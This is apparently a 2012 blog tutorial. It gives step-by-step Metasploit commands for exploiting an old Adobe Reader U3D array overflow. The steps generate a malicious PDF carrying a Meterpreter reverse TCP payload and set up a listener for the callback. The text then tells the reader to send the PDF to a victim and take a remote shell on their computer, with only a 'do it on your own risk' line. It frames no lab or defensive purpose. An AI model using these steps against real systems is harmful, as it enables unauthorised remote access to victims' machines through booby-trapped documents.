Friday, 13 April 2012

Adobe U3D CLODProgressiveMeshDeclaration Array Overrun

This module exploits an array overflow in Adobe Reader and Adobe Acrobat. Affected versions include < 7.1.4, < 8.2, and < 9.3. By creating a specially crafted pdf that a contains malformed U3D data, an attacker may be able to execute arbitrary code.

Exploit Targets


Adobe Reader and Acrobat Professional prior to version 9.3

Acrobat prior to version 8.2

Adobe Reader 9.0.0

Requirement

Attacker: Backtrack 5

Victim PC: Windows XP

Open backtrack terminal type msfconsole

Now type use exploit/windows/fileformat/adobe_u3d_meshdecl

Msf exploit (adobe_u3d_meshdecl)>set outpathpath /home/desktop

Msf exploit (adobe_u3d_meshdecl)>set payload windows/meterpreter/reverse_tcp

Msf exploit (adobe_u3d_meshdecl)>set lhost xxx.xxx.xxx (IP of Local Host)

Msf exploit (adobe_u3d_meshdecl)>exploit



After we successfully generate the malicious PDF, it will stored on your local computer

/root/.msf4/local/msf.pdf

Now we need to set up a listener to handle reverse connection sent by victim when the exploit successfully executed.
use exploit/multi/handler

set payload windows/meterpreter/reverse_tcp

set lhost xxx.xxx.xxx

exploit

Now send your msf.pdf files to victim, as soon as they download and open it. Now you can access meterpreter shell on victim computer.


NOTE: Do it on your own risk

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